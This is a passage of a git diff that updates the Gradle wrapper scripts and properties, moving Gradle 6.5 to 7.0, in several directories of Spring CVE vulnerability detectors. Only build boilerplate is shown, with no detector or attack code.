"$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/spring_cloud_function_cve_2022_22963/gradlew.bat b/community/detectors/spring_cloud_function_cve_2022_22963/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/spring_cloud_function_cve_2022_22963/gradlew.bat +++ b/community/detectors/spring_cloud_function_cve_2022_22963/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.jar b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew +++ b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew.bat b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew.bat +++ b/community/detectors/spring_cloud_gateway_cve_2022_22947/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.jar b/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.properties b/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/spring_framework_cve_2022_22965/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/spring_framework_cve_2022_22965/gradlew b/community/detectors/spring_framework_cve_2022_22965/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/spring_framework_cve_2022_22965/gradlew +++ b/community/detectors/spring_framework_cve_2022_22965/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid 